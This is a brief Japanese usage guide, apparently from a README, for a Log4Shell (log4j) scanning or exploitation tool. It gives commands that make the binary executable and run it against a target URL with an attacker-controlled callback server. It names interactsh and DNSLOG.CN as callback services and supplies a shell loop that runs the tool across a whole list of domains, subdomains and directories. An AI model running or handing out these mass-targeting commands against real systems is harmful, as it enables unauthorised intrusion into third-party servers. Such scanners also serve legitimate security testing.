chmod +x log4j
上記のコマンド実行後、ターゲットを指定するだけです
./log4j [YOUR_TARGET_URL] [YOUR_REMOTE_SERVER]
すべてのドメイン、サブドメイン、ディレクトリをリストにまとめる その後、以下のコマンドを実行します
chmod +x log4j
リモートサーバーは https://github.com/projectdiscovery/interactsh で作成するか、DNSLOG.CN を試すこともできます
cat [put_your_list_name_here.txt] | while read line ; do ./log4j $line [YOUR_Remote_Server_IP/URL_HERE] ;done